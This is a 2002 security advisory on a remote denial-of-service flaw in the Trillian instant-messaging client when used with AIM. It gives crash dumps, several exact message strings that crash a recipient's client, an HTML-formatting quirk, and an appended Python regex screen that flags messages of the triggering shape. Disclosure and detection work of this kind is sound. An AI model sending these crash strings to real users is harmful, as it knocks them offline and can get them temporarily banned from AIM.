Advisory Url:

########################################################
# ComputerSecurityNow Advisory Sep 23 2002
# Trillian Remote DoS Attack - AIM
#
# Spikeman - spikeman at computersecuritynow dot com
########################################################
#
# Thanks to Mith( for debugging dump
# logs and being a test subject.
#

Background on Trillian

Trillian allows you to connect to ICQ, AIM, MSN Messenger, Yahoo! Messenger and IRC in a single application.

Vulnerable Applications

Trillian .73 and .74 were tested; 1.0 Pro and any earlier versions are untested.
Tested on Win98/ME/2k/NT 4 while using AOL AIM services.
Tested MSN Messenger and it is unaffected.
Tested ICQ and it is unaffected.

Impact

Trillian crashes and has to be restarted. In addition, if the person is crashed repeatedly, AIM services will ban them for login flooding (timed ban).

Dumps when Trillian crashes:

1] The instruction at "0x022160df" referenced memory at "0x2228aa2c". The memory could not be "read".

2] Unhandled exception in trillian.exe (TALK.DLL): 0xC0000005: Access Violation.

3] 022160DF mov ecx,dword ptr [ebx+edx]

4] TRILLIAN caused an invalid page fault in module TALK.DLL at 0167:017660df.
Registers:
EAX=017a0078 CS=0167 EIP=017660df EFLGS=00010216
EBX=1fffffff SS=016f ESP=006a9580 EBP=006a95a0
ECX=017a11dc DS=016f ESI=00000008 FS=2a3f
EDX=018f01dd ES=016f EDI=31000001 GS=2a67
Bytes at CS:EIP:
8b 0c 13 f6 c1 01 89 4d f8 75 7f c1 f9 04 6a 3f
Stack dump:
018f1af2 018f01e1 00000066 bff7b99f 017a11dc 1fffffff 01765f71 31000001 018f1ac0 01762783 018a000c 018f01e1 018f01e1 0172e142 018f01e1 018f0210

#########################
# Offending Data String #
#########################

Send an AOL IM to someone with this string anywhere in the message (the spaces must be there):

P > O < C

and it will cause the application to crash. Other data strings also work, e.g.:

ee > 3e < 3dsaf
3 > 3 < 3
computer > security < now

##############
# Extra Data #
##############

This is a remote DoS only; sending the string from Trillian will not crash the local client.
I have found out that not all data strings work; for example, e > e < i will send through and post "e > e". Could this be an HTML parsing issue?

i (italic), b (bold) and u (underline) all do the same as above, but if you add another > everything after the word will be in the tag given.

String sent:
test > test < i > everything comes in italics

String came through:
test > test everything comes in italics
-------------^ italics starts here.

--
Spikeman
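As an added example (not part of the advisory, and not Trillian's own parser), a message screen for an IM gateway or log review that flags messages carrying the reported shape, a word, " > ", a word, " < ", a word, with the single spaces present. The regex and the function names are this example's own assumptions; it only flags candidates, since the advisory itself notes that not every string of this shape crashes the client.

```python
import re

# Heuristic taken from the advisory text: word, " > ", word, " < ", word,
# with exactly one space around each bracket. Assumed pattern, not Trillian's code.
TRIGGER_RE = re.compile(r"(?P<a>\S+) > (?P<b>\S+) < (?P<tag>\S+)")

# Formatting words the advisory says behave like the crash string.
KNOWN_FORMAT_TAGS = {"i", "b", "u"}


def find_trigger(message):
    """Return details of the first match of the reported pattern, or None."""
    m = TRIGGER_RE.search(message)
    if not m:
        return None
    tag = m.group("tag")
    return {
        "match": m.group(0),
        "tag": tag,
        "known_format_tag": tag.lower() in KNOWN_FORMAT_TAGS,
    }


def screen_messages(messages):
    """Return (index, details) for every message worth holding for review.

    Deliberately over-inclusive: the advisory's 'e > e < i' example passed
    through without a crash, so a hit is a candidate, not proof of a crash.
    """
    hits = []
    for i, msg in enumerate(messages):
        hit = find_trigger(msg)
        if hit:
            hits.append((i, hit))
    return hits


if __name__ == "__main__":
    # Constructed sample traffic, including strings quoted in the advisory.
    sample = [
        "hey, lunch at noon?",
        "P > O < C",                                     # advisory's crash string
        "P>O<C",                                         # no spaces: not the reported shape
        "computer > security < now",
        "test > test < i > everything comes in italics",  # italics variant
    ]
    for idx, hit in screen_messages(sample):
        print(idx, hit)
```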